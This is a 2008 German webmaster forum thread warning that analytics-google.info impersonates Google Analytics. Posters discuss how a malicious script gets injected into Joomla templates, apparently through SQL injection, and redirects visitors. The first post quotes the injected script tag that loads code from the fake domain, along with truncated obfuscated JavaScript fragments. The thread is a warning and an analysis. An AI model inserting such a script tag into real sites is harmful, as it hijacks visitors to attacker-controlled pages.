Anzeige - [Interessiert an einer Anzeige?]
(?) Tags raten (?) (edit)
 
Reply to this topicStart new topicStart Poll
> Falsche Google Site Hackt
Thema abonnieren | Thema versenden | Thema drucken
woody
Geschrieben am: Fr 20.06.2008, 15:36
Report PostQuote Post

AyomRank 6
************

Gruppe: Member (aktiv)
Beiträge: 659
Mitglied seit: 18.11.2006
analytics-google.info ist nicht von Google!

Die Seite wird hier bereits als Malware gelistet:
http://www.malwaredomainlist.com/mdl...cs-google.info


Es wird Code in die index.php vom Template eingeschleust der auf den ersten Blick wie der Tracking Code von Google Analytics aussieht
<script src="http://analytics-google.info/urchin.js"></script>

Original: <script src="http://www.google-analytics.com/urchin.js">

Neben diesem urchin.js wird weiterer verschlüsselter Code eingebunden:
http://www.joomlaportal.de/sicherhei...tml#post666372

Oben im Template:
<!-- ad --><script>function c1131313m4857aa739c121(m4857aa739c91a){ function m4857 .... usw.

Ganz am ende im Template:
<script>check_content()</script><!-- 1213806179 --><!-- ad --><script>function c1131313m4857aa739c121(m4857aa739c91a) ... usw.


Wenn der Code in der Seite enthalten ist, werden Besucher die die Seite bei Google in den Suchergebnissen anklicken
auf eine analytics-google.info Suchseite weitergeleitet.
Die Suchbegriffe mit der die original Seite bei Google gefunden wurde werden übernommen.

Von den neuen Suchergebnissen wird man dann über Affiliate Seiten auf weitere Seiten geleitet.


Infos durch welche Lücke der Code eingeschleust wird gibt es bist jetzt nicht.
Und es ist auch noch unbekannt ob noch mehr auf der Seite verändert wird.

woody


--------------------
iBlogger - Diskussionen unter Bloggern
Schweizerblog NEU
Openairguide.com!

Begriffserklärung:
Website = Gesamter Webauftritt
Homepage = Startseite einer Website
Webseite = Eine einzige Seite des Webauftitts
Top
PMEmail PosterUsers Website
Top
 
 
AdMarkt
#2 Geschrieben am: Fr 20.06.2008, 16:43 (+01:07)
Report PostQuote Post

AyomRank 5
**********

Gruppe: Member (aktiv)
Beiträge: 236
Mitglied seit: 18.12.2006
kann es sein, dass die Seite mittlerweile schon auf das "richtige" Analytics linkt?


--------------------
günstige VServer im Vergleich: www.server-vergleich.net
Newsportal zum Artikel pushen: unorganized.de
AV mit 6 Jahre alter Domain: www.2-get.de
Top
PMEmail Poster
Top
 
jAuer
Jürgen Auer - freiberufl. Programmierer
#3 Geschrieben am: Fr 20.06.2008, 17:09 (+00:25)
Report PostQuote Post

AyomRank 9
Group Icon

Gruppe: Experten Entwicklung
Beiträge: 2192
Mitglied seit: 4.02.2006
Wenn man nach der Site googelt, findet man gleich die Alexa-Statistik:

Traffic-Details

Da dürften schon ziemlich viele Seiten infiziert worden sein.

QUOTE (AdMarkt @ Fr 20.06.2008, 16:43)
kann es sein, dass die Seite mittlerweile schon auf das "richtige" Analytics linkt?

Es ist nicht zu empfehlen, auf so eine Seite zu gehen.

Auch der neueste FireFox 3 hat ja schon wieder irgendein Loch. Zum Überprüfen / Angucken irgendein Download-Tool nutzen.

QUOTE (woody @ Fr 20.06.2008, 15:36)
Es wird Code in die index.php vom Template eingeschleust


Na ja, zunächst einmal ist das bloß ein Joomla-Problem.

Interessanter ist dieser Hinweis:

Es scheint sich mal wieder um automatisierte Sql-Injektionen zu handeln, die (analog zu den hier und dort besprochenen Techniken) eben JavaScript-Code einschleusen. Nun nicht mehr auf dem MS-SqlServer, sondern wohl auf Joomla.


--------------------
Web-Anwendung 3.0: Ein Online-Kalender für Termine vieler Filialen.

server-daten: Web-Datenbanken als Online - CRM - Lösung.
Konzentrieren Sie sich auf Ihr Kerngeschäft - nutzen Sie eine schlanke, schnelle Online-Datenbank von verschiedenen Standorten.
Top
PMEmail PosterUsers Website
Top
 
Lenny
#4 Geschrieben am: Sa 21.06.2008, 12:41 (+19:31)
Report PostQuote Post

AyomRank 4
********

Gruppe: Member (aktiv)
Beiträge: 146
Mitglied seit: 20.02.2004
QUOTE (jAuer @ Fr 20.06.2008, 17:09)
[...] Nun nicht mehr auf dem MS-SqlServer, sondern wohl auf Joomla.[...]

Joomla basiert auf einer SQL-Datenbank, deshalb ist es auch anfällig für SQL-Injektionen.


--------------------
Online Shopping Schweiz - eShop1.ch
Top
PMEmail Poster
Top
 
Thema wird von 0 Benutzer(n) gelesen (0 Gäste und 0 anonyme Benutzer)
0 Mitglieder:
« Suche Seite mit "Kaufvideos" ähnlich Fotolia | Webmaster Allgemein | Suche Webkataloge ohne Backlinkpflicht »
Trackback-Url: http://www.ayom.com/track/t/25023
Dieses Thema abonnieren

Topic Options Reply to this topicStart new topicStart Poll

 


> Ähnliche Themen
Themen Titel Autor Views Antworten Letzte Aktion
findet google ...24.de domains? A-Markets 61 1 Do 28.08.2008, 22:12
Google kann Hacken. Mark_L 109 4 Do 28.08.2008, 19:01
Google Admanager hatschi1810 174 4 Do 28.08.2008, 08:17
Google Referrer auslesen Big Rob 57 3 Mi 27.08.2008, 09:25
Javascript problem für Google? Mark_L 79 5 Di 26.08.2008, 21:36
Google Pagerank Vorhersage spacefun 376 6 Di 26.08.2008, 12:12
Keywords für meine Site?! devil900 123 1 Sa 23.08.2008, 00:42
Liste mit Google Sexkeywords ranton 221 3 Sa 16.08.2008, 14:07
Google´s Zukunft Mark_L 1122 22 Fr 15.08.2008, 06:26
IE6 vs. Google Maps Alain Aubert 122 1 Mo 11.08.2008, 21:22




Anzeige - [Interessiert an einer Anzeige?]



Anzeigen


[Interessiert an einer Anzeige?]